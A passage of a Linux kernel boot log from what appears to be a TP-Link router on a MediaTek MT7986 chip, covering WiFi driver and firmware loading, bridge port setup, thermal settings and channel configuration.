14.992073] conninfra@(consys_spi_write_nolock:693) addr = 0x0070, val = 0x00000005 [ 14.993082] conninfra@(consys_spi_write_nolock:693) addr = 0x0070, val = 0x88888005 [ 14.995047] conninfra@(consys_spi_write_nolock:693) addr = 0x0070, val = 0x00000005 [ 14.995994] conninfra@(_consys_polling_chipid_int:482) Read CONNSYS HW IP version successfully! (0x02070000) [ 14.995997] conninfra@(_consys_hw_conninfra_wakeup:470) conninfra_wakeup refcnt=[0]→[1] wakeup!! [ 14.996007] conninfra@(_consys_hw_conninfra_sleep:490) conninfra_sleep refcnt=[1]→[0] sleep!! [ 14.996010] conninfra@(opfunc_power_on_internal:241) [Conninfra Pwr On] BT=[0] FM=[0] GPS=[0] WF=[0] CONNINFRA=[1] [ 15.025988] [ 15.025991] [ 15.025992] br_dhcp_event init [ 15.025993] [ 15.025998] nmsEventKthread create [ 15.026152] nms_event family.id=28 [ 15.026153] nms_event init OK [ 15.062965] wlan_assoc_genl_mcgrp.id=29 [ 15.062969] wlan_assoc_init OK [ 15.125328] warp_module_init(): module init and register callback for warp [ 15.125342] create warp_ctrl ok!!! [ 15.125379] wed_get_slot_map(): assign slot_id:0 for entry: 0! [ 15.125391] wed_get_slot_map(): assign slot_id:1 for entry: 1! [ 16.505255] conninfra@(conninfra_pwr_on:120) [conninfra_pwr_on] drv=[3] [ 16.506192] conninfra@(_consys_polling_chipid_int:482) Read CONNSYS HW IP version successfully! (0x02070000) [ 16.515231] Adie Type: 0x7976 [ 16.515232] SKU Type: 6000 [ 16.515236] conninfra@(opfunc_power_on_internal:241) [Conninfra Pwr On] BT=[0] FM=[0] GPS=[0] WF=[1] CONNINFRA=[1] [ 16.575458] WiFi@C12L1,get_dbg_setting_by_profile() 4523: debug level setting=INDEX0_debug_level not found!! [ 16.575474] WiFi@C12L1,get_dbg_setting_by_profile() 4546: debug option setting=INDEX0_debug_option not found!! [ 16.575548] mt_rbus 0000:00:00.0: runtime IRQ mapping not provided by arch [ 16.582429] mt7986_init()-→ [ 16.582457] sku:0xf, ADIE=MT7976 [ 16.582458] ←-mt7986_init() [ 16.582536] Open file “/rom/etc/wireless/l1profile.dat” Succeed! [ 16.582588] WiFi@C12L1,match_index_by_chipname() 514: not find chip name INDEX1 [ 16.582601] WiFi@C12L1,match_index_by_chipname() 514: not find chip name INDEX2 [ 16.582615] WiFi@C12L1,match_index_by_chipname() 514: not find chip name INDEX3 [ 16.582628] WiFi@C12L1,match_index_by_chipname() 514: not find chip name INDEX4 [ 16.582641] WiFi@C12L1,match_index_by_chipname() 514: not find chip name INDEX5 [ 16.582654] WiFi@C12L1,match_index_by_chipname() 514: not find chip name INDEX6 [ 16.582667] WiFi@C12L1,match_index_by_chipname() 514: not find chip name INDEX7 [ 16.582680] WiFi@C12L1,match_index_by_chipname() 514: not find chip name INDEX8 [ 16.582694] WiFi@C12L1,match_index_by_chipname() 514: not find chip name INDEX9 [ 16.585555] meshNetlinkInit [ 16.585578] [wps]wpsImple_Attach: Attach wps proxy module. [ 16.585583] _radiusAddAd pAd(0000000024f012f1) add to idx 0. [ 16.592608] nf_conntrack_rtsp v0.7 loading [ 16.594541] nf_nat_rtsp v0.7 loading [ 16.751387] ipset kmod ipauthlimit loading [ 16.781158] Registered character driver slp_gpio_chrdev [ 17.045826] set dbglvl 0 [ 17.053215] 11 MB zones of rules cnt 4800 initialized successfully at 000000001fc4ca78, zone cnt 15. [ 17.053229] CSE's first reload [ 17.054803] sal_fileno is unsupport [ 17.056500] [ 17.056500] TP-LINK CSE 1.0.0 Build 20220616 Rel59605n [ 17.056500] APP_VERSION - 2.0 [ 17.056500] [ 17.056589] icc: changing RX handler from icc_destroy+0x88/0x540 [icc] [0000000049e5b277] to csedbg_switch+0x50/0x780 [appdist] [000000004ccd6eaa] [ 17.056591] xt_appdist 1.0.0 loaded, g_extapp_type 0. [ 19.995685] gpio 8 request success. [ 20.332405] gpio 7 request success. [ 20.381083] gpio 12 request success. [ 20.954785] br-lan: port 1(vir-eth0.1) entered blocking state [ 20.954790] br-lan: port 1(vir-eth0.1) entered disabled state [ 20.954851] device vir-eth0.1 entered promiscuous mode [ 20.954853] device eth0.1 entered promiscuous mode [ 20.957936] br-lan: port 2(vir-eth0.5) entered blocking state [ 20.957940] br-lan: port 2(vir-eth0.5) entered disabled state [ 20.958003] device vir-eth0.5 entered promiscuous mode [ 20.958004] device eth0.5 entered promiscuous mode [ 20.959293] br-lan: port 3(vir-eth1) entered blocking state [ 20.959296] br-lan: port 3(vir-eth1) entered disabled state [ 20.959351] device vir-eth1 entered promiscuous mode [ 20.959353] device eth1 entered promiscuous mode [ 21.090908] ----IGMP init begin------ [ 21.090916] wan_dev_index = 255 lan_dev_name=br-lan wan_dev_name=vir-eth6 [ 21.090934] ----IGMP has been loaded------ [ 21.475715] g_band_width_detect_enable = 1 [ 21.495513] Driver is closing, forbid any ioctl [ 21.763244] tp_meshing events being sent to PID:1389 [ 21.771420] start write config partition...partition_offset is 0x1c0000, size = 0x10000 [ 21.816428] device eth1 left promiscuous mode [ 21.817479] br-lan: port 4(bond0) entered blocking state [ 21.817484] br-lan: port 4(bond0) entered disabled state [ 21.817574] device bond0 entered promiscuous mode [ 22.426202] Received a 784256-byte update pack. [ 22.426698] [CSE] APPID db loaded. [ 22.937979] mtk_soc_eth 15100000.ethernet eth1: configuring for fixed/2500base-x link mode [ 22.938038] mtk_soc_eth 15100000.ethernet eth1: Link is Up - 2.5Gbps/Full - flow control rx/tx [ 22.938285] device eth0 entered promiscuous mode [ 22.939090] br-lan: port 3(vir-eth1) entered blocking state [ 22.939097] br-lan: port 3(vir-eth1) entered forwarding state [ 22.939115] br-lan: port 2(vir-eth0.5) entered blocking state [ 22.939120] br-lan: port 2(vir-eth0.5) entered forwarding state [ 22.939131] br-lan: port 1(vir-eth0.1) entered blocking state [ 22.939135] br-lan: port 1(vir-eth0.1) entered forwarding state [ 22.985884] IPv6: ADDRCONF(NETDEV_CHANGE): br-lan: link becomes ready [ 22.997208] lan ip is 0xc0a80101 [ 24.033818] gpio 9 request success. [ 24.078714] Register dns6 proxy udp hook success! [ 24.078719] Register dns6 proxy tcp hook success! [ 24.117475] Open file “/rom/etc/wireless/l1profile.dat” Succeed! [ 24.135277] warp_cap_support(): chip_id=7986 is in WHNAT support list [ 24.135284] warp_entry_acquire(): bus slot:0, hook to WARP, entry id=0, entry: 000000000c68cd90 [ 24.135288] client_hif_specific_get(): hw→base_phy_addr 0x18000000!! [ 24.135380] warp_entry_get_by_pdev(): return entry[0] [ 24.135463] warp_msg_register():warp,pid,2056,id,0,wed_idx,0 [ 24.135495] wed_init(0): res_start = 0x15010000, size = 1000, irq=6,base_addr=0xffffffc0122a5000 [ 24.135891] wed_ring_init(): wed tx ring init result = 0 [ 24.136337] wed_ring_init(): wed rx ring init result = 0 [ 24.144029] create wed ok!!! [ 24.144048] wdma_init(): wdma(0) base_addr=0xffffffc0122ad800, base_phy_addr=0x15104800 [ 24.144683] warp_woif_bus_init_hw(): bus:000000000be9334a, txring: 20, pa: 0x0000000057000000, 0x0000000057000000, 24, 28, 3c [ 24.144687] warp_woif_bus_init_hw(): bus:000000000be9334a, rxring: 50, pa: 0x00000000571f0000, 0x00000000571f0000, 54, 58, 6c [ 24.144709] get_region_info(): wed_idx = 0, base_addr = 0x000000001d6219f5, size = 0x40000, res.start = 0x4fd00000, shared:0 [ 24.144718] get_region_info(): wed_idx = 0, base_addr = 0x00000000def9f151, size = 0x8000, res.start = 0x151e0000, shared:0 [ 24.144754] get_region_info(): wed_idx = 0, base_addr = 0x000000004aed8b79, size = 0x240000, res.start = 0x4fd80000, shared:1 [ 24.144763] get_region_info(): wed_idx = 0, base_addr = 0x000000001283dfef, size = 0x1000, res.start = 0x15194000, shared:0 [ 24.144765] warp_fwdl_mcu_mode(): mcu mode, need fwdl [ 24.188933] ########## WO Firmware ########## [ 24.188940] Chip ID: 0x0000 [ 24.188941] ECO version:0 [ 24.188944] Version: DEV_000000 [ 24.188946] Build date: 20220527182301 [ 24.188947] Total region:3 [ 24.188948] ################################# [ 24.188949] Parsing tailer region 0 [ 24.188951] Target address: 0x151e0000 [ 24.188953] Download size: 20400 [ 24.188978] Parsing tailer region 1 [ 24.188979] Target address: 0x4fd00000 [ 24.188980] Download size: 87072 [ 24.189040] Parsing tailer region 2 [ 24.189041] Target address: 0x4fd80000 [ 24.189042] Download size: 2283984 [ 24.190606] warp_fwdl_ready_check_mcu_mode(): waiting for wocpu [ 24.212410] warp_fwdl_ready_check_mcu_mode(): wocpu is ready [ 24.212439] warp_woctrl_init_state(), wo_state: WO_STATE_ENABLE [ 24.212452] wo_proc_init done 00000000e225dc0b [ 24.212455] wo_exep_proc_init done 00000000e225dc0b [ 24.212483] wo_exception_init(0): exp log= 0x000000008675eaa1, phy_addr= 0x0000000054af0000 size= 32768 [ 24.212573] warp_probe(): probe fail since warp is full! [ 24.212582] warp_dev0: probe of 15010000.wed2 failed with error -1 [ 24.216843] WiFi@C02L1,HwCtrlInit() 504: ser_init() return NDIS_STATUS_FAILURE [ 24.216870] [ 24.216871] [ 24.216872] maclimit init [ 24.216872] [ 24.292472] WiFi@C12L1,RTMPWirelessModeCfg() 596: Init: BSS0 PhyMode=78 [ 24.292479] WiFi@C12L1,RTMPWirelessModeCfg() 596: Init: BSS1 PhyMode=78 [ 24.292482] WiFi@C12L1,RTMPWirelessModeCfg() 596: Init: BSS2 PhyMode=78 [ 24.292485] WiFi@C12L1,RTMPWirelessModeCfg() 596: Init: BSS3 PhyMode=78 [ 24.292489] WiFi@C12L1,RTMPWirelessModeCfg() 596: Init: BSS4 PhyMode=78 [ 24.292492] WiFi@C12L1,RTMPWirelessModeCfg() 596: Init: BSS5 PhyMode=78 [ 24.292495] WiFi@C12L1,RTMPWirelessModeCfg() 596: Init: BSS6 PhyMode=78 [ 24.292498] WiFi@C12L1,RTMPWirelessModeCfg() 596: Init: BSS7 PhyMode=78 [ 24.292501] WiFi@C12L1,RTMPWirelessModeCfg() 596: Init: BSS8 PhyMode=177 [ 24.292505] WiFi@C12L1,RTMPWirelessModeCfg() 596: Init: BSS9 PhyMode=177 [ 24.292508] WiFi@C12L1,RTMPWirelessModeCfg() 596: Init: BSS10 PhyMode=177 [ 24.292512] WiFi@C12L1,RTMPWirelessModeCfg() 596: Init: BSS11 PhyMode=177 [ 24.292515] WiFi@C12L1,RTMPWirelessModeCfg() 596: Init: BSS12 PhyMode=177 [ 24.292518] WiFi@C12L1,RTMPWirelessModeCfg() 596: Init: BSS13 PhyMode=177 [ 24.292521] WiFi@C12L1,RTMPWirelessModeCfg() 596: Init: BSS14 PhyMode=177 [ 24.292524] WiFi@C12L1,RTMPWirelessModeCfg() 596: Init: BSS15 PhyMode=177 [ 24.347469] WiFi@C15L1,Set_PMFMFPC_Proc() 1722: [PMF] :: apidx=0, Desired MFPC=1 [ 24.347475] WiFi@C15L1,Set_PMFMFPC_Proc() 1722: [PMF] :: apidx=1, Desired MFPC=1 [ 24.347479] WiFi@C15L1,Set_PMFMFPC_Proc() 1722: [PMF] :: apidx=2, Desired MFPC=1 [ 24.347482] WiFi@C15L1,Set_PMFMFPC_Proc() 1722: [PMF] :: apidx=3, Desired MFPC=1 [ 24.347485] WiFi@C15L1,Set_PMFMFPC_Proc() 1722: [PMF] :: apidx=4, Desired MFPC=1 [ 24.347489] WiFi@C15L1,Set_PMFMFPC_Proc() 1722: [PMF] :: apidx=5, Desired MFPC=1 [ 24.347492] WiFi@C15L1,Set_PMFMFPC_Proc() 1722: [PMF] :: apidx=6, Desired MFPC=1 [ 24.347495] WiFi@C15L1,Set_PMFMFPC_Proc() 1722: [PMF] :: apidx=7, Desired MFPC=1 [ 24.347498] WiFi@C15L1,Set_PMFMFPC_Proc() 1722: [PMF] :: apidx=8, Desired MFPC=1 [ 24.347501] WiFi@C15L1,Set_PMFMFPC_Proc() 1722: [PMF] :: apidx=9, Desired MFPC=1 [ 24.347504] WiFi@C15L1,Set_PMFMFPC_Proc() 1722: [PMF] :: apidx=10, Desired MFPC=1 [ 24.347507] WiFi@C15L1,Set_PMFMFPC_Proc() 1722: [PMF] :: apidx=11, Desired MFPC=1 [ 24.347511] WiFi@C15L1,Set_PMFMFPC_Proc() 1722: [PMF] :: apidx=12, Desired MFPC=1 [ 24.347514] WiFi@C15L1,Set_PMFMFPC_Proc() 1722: [PMF] :: apidx=13, Desired MFPC=1 [ 24.347517] WiFi@C15L1,Set_PMFMFPC_Proc() 1722: [PMF] :: apidx=14, Desired MFPC=1 [ 24.347520] WiFi@C15L1,Set_PMFMFPC_Proc() 1722: [PMF] :: apidx=15, Desired MFPC=1 [ 24.348337] ApMWDS[0]=0 [ 24.348338] ApMWDS[1]=0 [ 24.348339] ApMWDS[2]=0 [ 24.348340] ApMWDS[3]=0 [ 24.348341] ApMWDS[4]=0 [ 24.348342] ApMWDS[5]=0 [ 24.348344] ApMWDS[6]=0 [ 24.348345] ApMWDS[7]=1 [ 24.348346] ApMWDS[8]=0 [ 24.348347] ApMWDS[9]=0 [ 24.348348] ApMWDS[10]=0 [ 24.348350] ApMWDS[11]=0 [ 24.348351] ApMWDS[12]=0 [ 24.348352] ApMWDS[13]=0 [ 24.348353] ApMWDS[14]=0 [ 24.348355] ApMWDS[15]=1 [ 24.348524] ApCliMWDS[0]=0 [ 24.348526] ApCliMWDS[1]=0 [ 24.352798] WiFi@C12L1,rtmp_read_ap_client_from_file() 1596: APCLI[0] ApCliMuMimoDlEnable = 0 [ 24.352802] WiFi@C12L1,rtmp_read_ap_client_from_file() 1596: APCLI[1] ApCliMuMimoDlEnable = 0 [ 24.352953] WiFi@C12L1,rtmp_read_ap_client_from_file() 1615: APCLI[0] ApCliMuMimoUlEnable = 0 [ 24.352957] WiFi@C12L1,rtmp_read_ap_client_from_file() 1615: APCLI[1] ApCliMuMimoUlEnable = 0 [ 24.354315] WiFi@C03L1,AndesSendCmdMsg() 754: Could not send in band command due to diablefRTMP_ADAPTER_MCU_SEND_IN_BAND_CMD [ 24.354321] WiFi@C03L1,AndesSendCmdMsg() 754: Could not send in band command due to diablefRTMP_ADAPTER_MCU_SEND_IN_BAND_CMD [ 24.362655] I/F(ra0) WPS capable=1 [ 24.362657] I/F(ra1) WPS capable=1 [ 24.362658] I/F(ra2) WPS capable=1 [ 24.362659] I/F(ra3) WPS capable=1 [ 24.362660] I/F(ra4) WPS capable=1 [ 24.362662] I/F(ra5) WPS capable=1 [ 24.362663] I/F(ra6) WPS capable=1 [ 24.362664] I/F(ra7) WPS capable=0 [ 24.362666] I/F(ra8) WPS capable=1 [ 24.362667] I/F(ra9) WPS capable=1 [ 24.362668] I/F(ra10) WPS capable=1 [ 24.362669] I/F(ra11) WPS capable=1 [ 24.362670] I/F(ra12) WPS capable=1 [ 24.362672] I/F(ra13) WPS capable=1 [ 24.362673] I/F(ra14) WPS capable=1 [ 24.362674] I/F(ra15) WPS capable=0 [ 24.383394] BandIdx = 0, tpcDutyInitFlag=1 [ 24.383395] BandIdx = 1, tpcDutyInitFlag=1 [ 24.383569] BandIdx = 0, tpcnitFlag=1 [ 24.383570] BandIdx = 1, tpcnitFlag=1 [ 24.383747] BandIdx = 0, tpcDuty=100-70-45-30 [ 24.383749] BandIdx = 1, tpcDuty=100-70-50-30 [ 24.383923] BandIdx = 0, thermalHighEn=1 [ 24.383924] BandIdx = 1, thermalHighEn=1 [ 24.384099] BandIdx = 0, thermalHighCritera=114 [ 24.384100] BandIdx = 1, thermalHighCritera=114 [ 24.384275] BandIdx = 0, thermalLowEn=1 [ 24.384276] BandIdx = 1, thermalLowEn=1 [ 24.384451] BandIdx = 0, thermalLowCritera=108 [ 24.384453] BandIdx = 1, thermalLowCritera=108 [ 24.384629] BandIdx = 0, thermalRecheckTime=30 [ 24.384630] BandIdx = 1, thermalRecheckTime=30 [ 24.384805] BandIdx = 0, thermalRFOffEn=1 [ 24.384807] BandIdx = 1, thermalRFOffEn=1 [ 24.384982] BandIdx = 0, thermalRFOffCriteria=125 [ 24.384983] BandIdx = 1, thermalRFOffCriteria=125 [ 24.385160] BandIdx = 0, thermalUcType=1 [ 24.385161] BandIdx = 1, thermalUcType=1 [ 24.385194] wdma_dma_ctrl(): WDMA_GLO_CFG=50404e70, txrx = 0 [ 24.390780] wdma_dma_ctrl(): WDMA_GLO_CFG=40804e70, txrx = 0 [ 24.398158] warp_tx_ring_init_hw(): configure ring 0 setting [ 24.398167] warp_tx_ring_init_hw(): wed:00000000340cae9e wifi:00000000f735b6e2: 24420=572d0000,24424=2048,24428=0 [ 24.398169] warp_tx_ring_init_hw(): configure ring 1 setting [ 24.398172] warp_tx_ring_init_hw(): wed:00000000340cae9e wifi:00000000f735b6e2: 24430=57018000,24434=2048,24438=0 [ 24.398289] set_rrocfg,0 [ 24.421164] wdma_dma_ctrl(): WDMA_GLO_CFG=40804e74, txrx = 3 [ 24.421170] sku:0xf, ADIE=MT7976 [ 24.421171] using E1 ROM patch [ 24.421172] using E1 RAM [ 24.421177] current sync CR = 0x1 [ 24.435936] os_load_code_from_bin:load fw done(/lib/firmware/mt7986_patch_e1_hdr.bin) [ 24.435958] Built date: 20220704133455a [ 24.435964] Platform: ALPS [ 24.435967] HW/SW version: 0x8a108a10 [ 24.435971] Patch version: 0xffffffff [ 24.442313] current sync CR = 0x1 [ 24.718010] os_load_code_from_bin:load fw done(/lib/firmware/WIFI_RAM_CODE_MT7986.bin) [ 24.719916] Chip ID: 0x0f [ 24.719922] Eco version: 0x00 [ 24.719924] Region number: 0x0b [ 24.719926] Format version: 0x02 [ 24.719928] Format flag: 0x01 [ 24.719929] Ram version: 000000 [ 24.719934] Built date: 20220704133624 [ 24.719940] Common crc: 0x1b6d3dbd [ 24.719944] Release info: header tag = 0, total length = 0 [ 24.833055] os_load_code_from_bin:load fw done(/lib/firmware/7986_WACPU_RAM_CODE_release.bin) [ 24.833485] Chip ID: 0x00 [ 24.833490] Eco version: 0x00 [ 24.833492] Region number: 0x03 [ 24.833494] Format version: 0x02 [ 24.833496] Format flag: 0x01 [ 24.833497] Ram version: 000000 [ 24.833502] Built date: 20220704134845 [ 24.833508] Common crc: 0x39963193 [ 24.833510] Release info: header tag = 0, total length = 0 [ 24.927420] current sync CR = 0x7 [ 24.927474] efuse_probe: efuse = deaddead [ 24.927974] sku:0xf, ADIE=MT7976 [ 24.930459] WiFi@C02L1,is_cal_free_ic() 1002: is_cal_free_ic(1002) offset:1000, 0,0 [ 24.930462] sku:0xf, ADIE=MT7976 [ 24.944382] sku:0xf, ADIE=MT7976 [ 24.958549] WiFi@C02L1,is_cal_free_ic() 1021: iCal free [ 24.958558] sku:0xf, ADIE=MT7976 [ 26.029057] FAT-fs (sda1): utf8 is not a recommended IO charset for FAT filesystems, filesystem will be case sensitive! [ 26.031822] [EXFAT] trying to mount... [ 27.273621] EXT4-fs (sda1): recovery complete [ 27.273770] EXT4-fs (sda1): mounted filesystem with ordered data mode. Opts: (null) [ 28.858393] WiFi@C17L1,RTMPReadTxPwrPerRate() 450: (450): Don't Support this now! [ 28.858402] WiFi@C00L1,rc_set_radio_default() 661: rc_set_radio_default: pRadioCtrl→Channel=1 [ 28.858407] WiFi@C00L1,rc_set_radio_default() 661: rc_set_radio_default: pRadioCtrl→Channel=36 [ 28.858431] WiFi@C01L1,AntCfgInit() 3096: Not support for HIF_MT yet! [ 28.874748] WiFi@C17L1,tx_pwr_comp_init() 641: NotSupportYet! [ 28.874879] WiFi@C03L1,MtCmdSetMacTxRx() 10289: (ret = 0) [ 28.874990] WiFi@C03L1,MtCmdSetMacTxRx() 10289: (ret = 0) [ 28.875056] WiFi@C14L1,IPMacTable_init() 348: IPMacTable already inited! [ 28.895167] wdma_dma_ctrl(): WDMA_GLO_CFG=58804e75, txrx = 3 [ 28.895258] WiFi@C03L1,MtCmdSetMacTxRx() 10289: (ret = 0) [ 28.895372] WiFi@C03L1,MtCmdSetMacTxRx() 10289: (ret = 0) [ 28.895404] WiFi@C00L1,set_ack_timeout_mode_byband() 13381: CTS/ACK Timeout Range should between [0xFFFF:0]!! [ 28.895408] WiFi@C00L1,set_datcfg_ack_cts_timeout() 13469: DAT config band(0) cck_timeout Fail! [ 28.895410] WiFi@C00L1,set_ack_timeout_mode_byband() 13381: CTS/ACK Timeout Range should between [0xFFFF:0]!! [ 28.895414] WiFi@C00L1,set_datcfg_ack_cts_timeout() 13480: DAT config band(0) ofdm_timeout Fail! [ 28.895417] WiFi@C00L1,set_ack_timeout_mode_byband() 13381: CTS/ACK Timeout Range should between [0xFFFF:0]!! [ 28.895420] WiFi@C00L1,set_datcfg_ack_cts_timeout() 13491: DAT config band(0) ofdma_timeout Fail! [ 28.895422] WiFi@C00L1,set_ack_timeout_mode_byband() 13381: CTS/ACK Timeout Range should between [0xFFFF:0]!! [ 28.895425] WiFi@C00L1,set_datcfg_ack_cts_timeout() 13469: DAT config band(1) cck_timeout Fail! [ 28.895428] WiFi@C00L1,set_ack_timeout_mode_byband() 13381: CTS/ACK Timeout Range should between [0xFFFF:0]!! [ 28.895431] WiFi@C00L1,set_datcfg_ack_cts_timeout() 13480: DAT config band(1) ofdm_timeout Fail! [ 28.895434] WiFi@C00L1,set_ack_timeout_mode_byband() 13381: CTS/ACK Timeout Range should between [0xFFFF:0]!! [ 28.895437] WiFi@C00L1,set_datcfg_ack_cts_timeout() 13491: DAT config band(1) ofdma_timeout Fail! [ 28.895476] MtCmdPsStaFlushCtrl: fgPsSTAFlushEnable(1), u2FlushThldTotalMsduNum(6553), u2PerStaMaxMsduNum(64) [ 28.895494] mt_wifi_init: Band = 0, dutyLv0 = 100, dutyLv1 = 70, dutyLv2 = 45, dutyLv3 = 30 [ 28.895501] mt_wifi_init: Band = 0, high_en=1, high_thd = 114, low_en = 1, low_thd = 108, RFOFF_en = 1, RFOFF_th = 125, rec_timer = 30, Type = Duty Cycle [ 28.895515] mt_wifi_init: Band = 1, dutyLv0 = 100, dutyLv1 = 70, dutyLv2 = 50, dutyLv3 = 30 [ 28.895522] mt_wifi_init: Band = 1, high_en=1, high_thd = 114, low_en = 1, low_thd = 108, RFOFF_en = 1, RFOFF_th = 125, rec_timer = 30, Type = Duty Cycle [ 28.895556] WiFi@C13L1,Set_Sta1024QAMSupport() 16596: param.u1WlanID=0, param.u1fg1024Q=0 [ 28.895571] mt_wifi_init: Band = 0, dutyLv0 = 100, dutyLv1 = 70, dutyLv2 = 45, dutyLv3 = 30 [ 28.895578] mt_wifi_init: Band = 0, high_en=1, high_thd = 114, low_en = 1, low_thd = 108, RFOFF_en = 1, RFOFF_th = 125, rec_timer = 30, Type = Duty Cycle [ 28.895591] mt_wifi_init: Band = 1, dutyLv0 = 100, dutyLv1 = 70, dutyLv2 = 50, dutyLv3 = 30 [ 28.895598] mt_wifi_init: Band = 1, high_en=1, high_thd = 114, low_en = 1, low_thd = 108, RFOFF_en = 1, RFOFF_th = 125, rec_timer = 30, Type = Duty Cycle [ 28.895599] [ 28.895600] [ 28.895603] tp_feature_rrm_ndp_attach pData:0000000024f012f1 [ 28.895604] [ 28.895619] create netlink socket success [ 29.102694] WiFi@C00L1,MtCmdCr4RedSet() 912: MtCmdCr4RedSet: (ret = 0) [ 29.102699] WiFi@C00L1,SendRedCmd() 1047: SendRedCmd:(ret = 1) [ 29.103027] WiFi@C23L1,DfsBuildChannelList() 4073: [RDM]: wdev is not 5G. [ 29.103048] [RadarStateCheck] Zero Wait State: 0 [ 29.103177] operate_loader_phy: vap ra0, (caller:wlan_operate_init+0xa4/0x120 [mt7986b]) [ 29.103182] WiFi@C23L1,operate_loader_phy() 385: oper_cfg: prim_ch(1), ht_bw(1), extcha(1), vht_bw(0), cen_ch_2(0), PhyMode=78! [ 29.103191] WiFi@C23L1,operate_loader_phy() 396: operate_loader_phy(): oper_dev after adjust: bw(1), prim_ch(1), cen_ch_1(3), cen_ch_2(0),ext_cha(1), vht_bw(0)! [ 29.103202] WiFi@C00L1,operate_loader_phy() 405: operate_loader_phy(): oper_radio after decision: bw(1), prim_ch(1), cen_ch_1(3), cen_ch_2(0), vht_bw(0)! [ 29.316697] WiFi@C00L1,RcUpdateChannel() 882: RcUpdateChannel: pRadioCtrl→Channel, orig_chan=1, new_chan=1 [ 29.316731] WiFi@C12L1,wifi_sys_open() 898: wifi_sys_open():band0 group_idx[0]=0, bw_grp=16 omac=0 [ 29.318198] WiFi@C03L1,MtCmdSetMacTxRx() 10289: (ret = 0) [ 29.318311] WiFi@C03L1,MtCmdSetMacTxRx() 10289: (ret = 0) [ 29.318315] WiFi@C00L1,ApAutoChannelAtBootUp() 474: not A band [ 29.318557] Allocate ObjIdx:0 WmmIdx:0 [ 29.322201] WiFi@C00L1,TxCCKStreamCtrl() 21152: set wrong parameters [ 29.333056] PrintSrCmd: [ 29.333056] u1CmdSubId = 1, u1ArgNum = 0, u1DbdcIdx = 0, u1Status = 0 [ 29.333056] u1DropTaIdx = 0, u1StaIdx = 0, u4Value = 1 [ 29.333063] PrintSrCmd: [ 29.333063] u1CmdSubId = 5, u1ArgNum = 0, u1DbdcIdx = 0, u1Status = 0 [ 29.333063] u1DropTaIdx = 0, u1StaIdx = 0, u4Value = 0 [ 29.333070] PrintSrCmd: [ 29.333070] u1CmdSubId = 3, u1ArgNum = 0, u1DbdcIdx = 0, u1Status = 0 [ 29.333070] u1DropTaIdx = 0, u1StaIdx = 0, u4Value = 1 [ 29.333076] PrintSrCmd: [ 29.333076] u1CmdSubId = 23, u1ArgNum = 0, u1DbdcIdx = 0, u1Status = 0 [ 29.333076] u1DropTaIdx = 0, u1StaIdx = 0, u4Value = 1 [ 29.333081] PrintSrCmd: [ 29.333081] u1CmdSubId = 31, u1ArgNum = 0, u1DbdcIdx = 0, u1Status = 0 [ 29.333081] u1DropTaIdx = 0, u1StaIdx = 0, u4Value = 0 [ 29.333087] PrintSrCmd: [ 29.333087] u1CmdSubId = 33, u1ArgNum = 0, u1DbdcIdx = 0, u1Status = 0 [ 29.333087] u1DropTaIdx = 0, u1StaIdx = 0, u4Value = 0 [ 29.333118] mtk_ppe_dev_register_hook : ineterface ra0 register (1) [ 29.333567] [Set_MacAddr_Proc]set if_type:0, func_idx:0 mac! [ 29.333953] [RadarStateCheck] Zero Wait State: 0 [ 29.334098] operate_loader_phy: vap rax0, (caller:wlan_operate_init+0xa4/0x120 [mt7986b]) [ 29.334101] [mtf_txpower_all_rate_info] band_idx:0 pwr:54 ChBand:2G ePAGain:0 [ 29.334108] 7986@C23L1ra0,operate_loader_phy() 385: oper_cfg: prim_ch(36), ht_bw(1), extcha(1), vht_bw(0), cen_ch_2(0), PhyMode=177! [ 29.334115] 7986@C23L1ra0,operate_loader_phy() 396: operate_loader_phy(): oper_dev after adjust: bw(1), prim_ch(36), cen_ch_1(38), cen_ch_2(0),ext_cha(1), vht_bw(0)! [ 29.334134] 7986@C00L1ra0,operate_loader_phy() 405: operate_loader_phy(): oper_radio after decision: bw(1), prim_ch(36), cen_ch_1(38), cen_ch_2(0), vht_bw(0)! [ 29.334178] MtCmdChannelSwitch: set ucBW=1 & ucAPBW=0 , central=38 [ 29.563895] MtCmdSetTxRxPath: set ucBW=1 & ucAPBW=0 , central=38, ControlChannel=36, IS_ADJ_BW_ZERO_WAIT_TX80RX160=0 [ 29.569740] WiFi@C00L1,RcUpdateChannel() 882: RcUpdateChannel: pRadioCtrl→Channel, orig_chan=36, new_chan=36 [ 29.569763] 7986@C23L1ra0,DfsCacNormalStart() 3946: DfsCacNormalStart: CAC Start, band_idx=1. [ 29.569799] WiFi@C12L1,wifi_sys_open() 898: wifi_sys_open():band1 group_idx[8]=4, bw_grp=16 omac=0 [ 29.573047] 7986@C03L1ra0,MtCmdSetMacTxRx() 10289: (ret = 0) [ 29.573161] 7986@C03L1ra0,MtCmdSetMacTxRx() 10289: (ret = 0) [ 29.573165] 7986@C00L1ra0,ApAutoChannelAtBootUp() 468: zero-wait DFS is not enabled [ 29.573414] Allocate ObjIdx:8 WmmIdx:1 [ 29.588136] PrintSrCmd: [ 29.588136] u1CmdSubId = 1, u1ArgNum = 0, u1DbdcIdx = 1, u1Status = 0 [ 29.588136] u1DropTaIdx = 0, u1StaIdx = 0, u4Value = 1 [ 29.588144] PrintSrCmd: [ 29.588144] u1CmdSubId = 5, u1ArgNum = 0, u1DbdcIdx = 1, u1Status = 0 [ 29.588144] u1DropTaIdx = 0, u1StaIdx = 0, u4Value = 0 [ 29.588150] PrintSrCmd: [ 29.588150] u1CmdSubId = 3, u1ArgNum = 0, u1DbdcIdx = 1, u1Status = 0 [ 29.588150] u1DropTaIdx = 0, u1StaIdx = 0, u4Value = 1 [ 29.588156] PrintSrCmd: [ 29.588156] u1CmdSubId = 23, u1ArgNum = 0, u1DbdcIdx = 1, u1Status = 0 [ 29.588156] u1DropTaIdx = 0, u1StaIdx = 0, u4Value = 1 [ 29.588162] PrintSrCmd: [ 29.588162] u1CmdSubId = 31, u1ArgNum = 0, u1DbdcIdx = 1, u1Status = 0 [ 29.588162] u1DropTaIdx = 0, u1StaIdx = 0, u4Value = 0 [ 29.588167] PrintSrCmd: [ 29.588167] u1CmdSubId = 33, u1ArgNum = 0, u1DbdcIdx = 1, u1Status = 0 [ 29.588167] u1DropTaIdx = 0, u1StaIdx = 0, u4Value = 0 [ 29.588199] mtk_ppe_dev_register_hook : ineterface rax0 register (2) [ 29.588499] [Set_MacAddr_Proc]set if_type:8, func_idx:8 mac! [ 29.589088] [mtf_txpower_all_rate_info] band_idx:1 pwr:53 ChBand:5G ePAGain:0 [ 29.603556] br-lan: port 5(ra0) entered blocking state [ 29.603560] br-lan: port 5(ra0) entered disabled state [ 29.603685] device ra0 entered 